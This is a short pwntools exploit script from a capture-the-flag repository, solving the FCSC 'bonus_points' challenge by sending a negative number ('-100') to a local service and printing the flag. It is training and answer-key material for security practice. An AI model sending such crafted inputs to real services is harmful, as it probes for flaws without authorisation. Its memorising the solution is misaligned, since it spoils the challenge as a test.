Files
ctf/2024/hackropole/pwn/bonus_points/exploit.py
2025-06-06 03:13:31 +02:00

7 lines
179 B
Python

from pwn import remote, log
with remote("localhost", 4000, fam="ipv4") as p:
p.recvuntil(b"?\n")
p.sendline(b"-100")
log.info(p.recvregex("FCSC\{[0-9a-fA-F]{64}\}"))